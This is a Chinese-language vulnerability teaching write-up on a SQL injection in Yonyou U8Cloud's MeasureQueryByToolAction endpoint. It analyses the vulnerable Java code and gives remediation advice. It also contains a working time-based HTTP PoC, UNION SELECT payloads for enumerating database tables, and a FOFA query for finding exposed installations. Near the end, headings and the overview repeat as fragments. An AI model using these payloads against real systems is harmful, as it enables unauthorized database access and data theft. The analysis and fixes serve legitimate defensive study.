用友U8Cloud MeasureQueryByToolAction SQL注入漏洞分析教学文档<\/h1>

一、漏洞概述<\/h2>
用友U8Cloud系统的`MeasureQueryByToolAction<\/code>接口存在SQL注入漏洞，攻击者可通过构造恶意请求未经授权访问数据库，导致用户数据泄露。<\/p>`

二、影响版本<\/h2>
受影响版本包括：<\/p>

1.0<\/li>
2.0<\/li>
2.1<\/li>
2.3<\/li>
2.5<\/li>
2.6<\/li>
2.65<\/li>
2.7<\/li>
3.0<\/li>
3.1<\/li>
3.2<\/li>
3.5<\/li>
3.6<\/li>
3.6sp<\/li>
5.0<\/li>
5.0sp<\/li>
<\/ul>
三、漏洞原理深度分析<\/h2>
1. 请求处理流程<\/h3>


请求分发机制<\/strong>：<\/p>

Web.xml配置中，\/service<\/code>和\/servlet<\/code>前缀的请求都由NCInvokerServlet<\/code>处理<\/li>
URL格式：\/service\/~模块名\/服务名<\/code><\/li>
示例：\/service\/~iufo\/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction<\/code><\/li>
<\/ul>
<\/li>

ActionServlet处理<\/strong>：<\/p>

关键方法：RequestProcessor.getInstance().process(request, response, this)<\/code><\/li>
通过action<\/code>参数指定类名，method<\/code>参数指定方法名<\/li>
本例中调用nc.ui.iufo.query.measurequery.MeasureQueryByToolAction<\/code>的execute<\/code>方法<\/li>
<\/ul>
<\/li>
<\/ol>
2. 漏洞代码分析<\/h3>
漏洞位于nc.ui.iufo.query.measurequery.MeasureQueryByToolAction<\/code>类的execute<\/code>方法：<\/p>
public<\/span> ActionForward execute<\/span>(<\/span>ActionForm actionForm)<\/span> throws<\/span> WebException {<\/span>
<\/span><\/span>    ActionForward actionForward =<\/span> null<\/span>;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        String[]<\/span> cks =<\/span> getRequestParameterValues(<\/span>"query_id"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>cks ==<\/span> null<\/span> ||<\/span> cks.<\/span>length<\/span> ==<\/span> 0<\/span>)<\/span>
<\/span><\/span>            return<\/span> (<\/span>ActionForward)<\/span>new<\/span> CloseForward(<\/span>"close_refresh_main();"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        String strMq =<\/span> cks[<\/span>0<\/span>];<\/span>
<\/span><\/span>        String strRepId =<\/span> ""<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 漏洞触发点：将用户输入的query_id直接传入SQL查询
<\/span><\/span><\/span><\/span>        MeasureQueryConVO[]<\/span> mqCondVOs =<\/span> MeasureQueryConBO_Client.<\/span>loadQueryConVOs<\/span>(<\/span>new<\/span> String[]<\/span> {<\/span> strMq });<\/span>
<\/span><\/span>        
<\/span><\/span>        if<\/span> (<\/span>mqCondVOs ==<\/span> null<\/span> ||<\/span> mqCondVOs.<\/span>length<\/span> ==<\/span> 0<\/span>)<\/span>
<\/span><\/span>            throw<\/span> new<\/span> CommonException(<\/span>"miufo1003095"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        MeasureQueryConVO mqCondVO =<\/span> mqCondVOs[<\/span>0<\/span>];<\/span>
<\/span><\/span>        strRepId =<\/span> mqCondVO.<\/span>getM_strRepId<\/span>();<\/span>
<\/span><\/span>        if<\/span> (<\/span>strRepId ==<\/span> null<\/span>)<\/span>
<\/span><\/span>            strRepId =<\/span> ""<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        addRequestObject(<\/span>"report_id"<\/span>,<\/span> strRepId);<\/span>
<\/span><\/span>        addRequestObject(<\/span>"measureQueryId"<\/span>,<\/span> strMq);<\/span>
<\/span><\/span>        actionForward =<\/span> new<\/span> ActionForward(<\/span>RepToolAction.<\/span>class<\/span>.<\/span>getName<\/span>(),<\/span> "execute"<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>CommonException e)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> e;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        AppDebug.<\/span>debug<\/span>(<\/span>e);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> actionForward;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. SQL注入点分析<\/h3>
关键漏洞位于MeasureQueryConBO_Client.loadQueryConVOs<\/code>方法中：<\/p>
public<\/span> MeasureQueryConVO[]<\/span> loadQueryConVOs<\/span>(<\/span>String[]<\/span> strQueryConIds)<\/span> throws<\/span> SQLException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>strQueryConIds ==<\/span> null<\/span> ||<\/span> strQueryConIds.<\/span>length<\/span> <=<\/span> 0<\/span>)<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    Connection con =<\/span> getConnection();<\/span>
<\/span><\/span>    StringBuffer str =<\/span> new<\/span> StringBuffer(<\/span>"query_con_id in( "<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> strQueryConIds.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>        str =<\/span> str.<\/span>append<\/span>(<\/span>"'"<\/span>);<\/span>
<\/span><\/span>        str =<\/span> str.<\/span>append<\/span>(<\/span>strQueryConIds[<\/span>i]);<\/span>
<\/span><\/span>        str =<\/span> str.<\/span>append<\/span>(<\/span>"',"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    String strWhere =<\/span> str.<\/span>toString<\/span>();<\/span>
<\/span><\/span>    strWhere =<\/span> strWhere.<\/span>substring<\/span>(<\/span>0<\/span>,<\/span> str.<\/span>length<\/span>()<\/span> -<\/span> 1<\/span>)<\/span> +<\/span> ")"<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 直接拼接用户输入构造SQL语句
<\/span><\/span><\/span><\/span>    String sql =<\/span> "select query_con_id, con_name, con_note, repid, area, content,query_id from iufo_measure_query_con where "<\/span> +<\/span> strWhere;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行SQL查询...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞成因：<\/p>

直接拼接用户输入的query_id<\/code>参数到SQL语句中<\/li>
未进行任何参数过滤或预编译处理<\/li>
攻击者可通过构造特殊字符闭合SQL语句，注入恶意代码<\/li>
<\/ul>
四、漏洞复现<\/h2>
POC示例<\/h3>
GET<\/span> \/service\/~iufo\/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> <target><\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko\/20100101 Firefox\/128.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/png,image\/svg+xml,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span><\/code><\/pre>复现说明<\/h3>


这是一个基于时间延迟的SQL注入POC<\/p>
<\/li>

注入点：query_id<\/code>参数<\/p>
<\/li>

注入payload：1');WAITFOR DELAY '0:0:5'--<\/code><\/p>

闭合原有SQL语句<\/li>
添加WAITFOR DELAY命令使数据库延迟5秒响应<\/li>
使用--<\/code>注释掉后续语句<\/li>
<\/ul>
<\/li>

判断依据：如果服务器响应时间明显延迟5秒，则证明存在SQL注入漏洞<\/p>
<\/li>
<\/ol>
五、漏洞利用<\/h2>
1. 信息泄露<\/h3>
通过构造UNION SELECT语句，可以查询数据库中的敏感信息：<\/p>
query_id=1') UNION SELECT 1,2,3,4,5,6,7 FROM sysobjects--
<\/code><\/pre>
2. 数据库类型识别<\/h3>
根据响应特征可判断为SQL Server数据库：<\/p>

使用WAITFOR DELAY<\/code>语法<\/li>
注释符为--<\/code><\/li>
<\/ul>
3. 数据表枚举<\/h3>
示例payload：<\/p>
query_id=1') UNION SELECT 1,name,3,4,5,6,7 FROM sysobjects WHERE xtype='U'--
<\/code><\/pre>
六、修复建议<\/h2>
1. 临时缓解措施<\/h3>

在Web应用防火墙(WAF)中添加规则，拦截包含SQL关键词的请求<\/li>
禁用或限制对\/service\/~iufo\/com.ufida.web.action.ActionServlet<\/code>的访问<\/li>
<\/ul>
2. 根本解决方案<\/h3>

参数化查询<\/strong>：

修改loadQueryConVOs<\/code>方法，使用预编译语句：<\/li>
<\/ol>
String sql =<\/span> "select query_con_id, con_name, con_note, repid, area, content,query_id from iufo_measure_query_con where query_con_id = ?"<\/span>;<\/span>
<\/span><\/span>PreparedStatement pstmt =<\/span> con.<\/span>prepareStatement<\/span>(<\/span>sql);<\/span>
<\/span><\/span>pstmt.<\/span>setString<\/span>(<\/span>1<\/span>,<\/span> strQueryConIds[<\/span>0<\/span>]);<\/span>
<\/span><\/span>ResultSet rs =<\/span> pstmt.<\/span>executeQuery<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>

输入验证<\/strong>：<\/p>

对query_id<\/code>参数进行严格校验，只允许数字等预期字符<\/li>
使用正则表达式过滤特殊字符<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong>：<\/p>

数据库连接使用最小必要权限账户<\/li>
限制应用账户对敏感表的访问权限<\/li>
<\/ul>
<\/li>

错误处理<\/strong>：<\/p>

避免将数据库错误信息直接返回给客户端<\/li>
使用统一的错误处理机制<\/li>
<\/ul>
<\/li>
<\/ol>
3. 官方补丁<\/h3>

安装用友U8Cloud最新安全补丁<\/li>
关注用友官方安全公告获取修复版本<\/li>
<\/ul>
七、资产识别<\/h2>
使用FOFA语法搜索受影响系统：<\/p>
app="用友-U8-Cloud"
<\/code><\/pre>
八、总结<\/h2>
该漏洞是由于用友U8Cloud系统中MeasureQueryByToolAction<\/code>接口对用户输入的query_id<\/code>参数未做充分过滤，直接拼接到SQL语句中导致的SQL注入漏洞。攻击者可利用此漏洞获取数据库中的敏感信息，危害严重。建议用户及时采取修复措施，特别是使用参数化查询等安全编码实践来从根本上解决此类问题。<\/p>
用友U8Cloud MeasureQueryByToolAction SQL注入漏洞分析教学文档<\/h1>

一、漏洞概述<\/h2> 用友U8Cloud系统的MeasureQueryByToolAction<\/code>接口存在SQL注入漏洞，攻击者可通过构造恶意请求未经授权访问数据库，导致用户数据泄露。<\/p>

三、漏洞原理深度分析<\/h2>

四、漏洞复现<\/h2>

五、漏洞利用<\/h2>

六、修复建议<\/h2>

一、漏洞概述<\/h2>
用友U8Cloud系统的`MeasureQueryByToolAction<\/code>接口存在SQL注入漏洞，攻击者可通过构造恶意请求未经授权访问数据库，导致用户数据泄露。<\/p>`
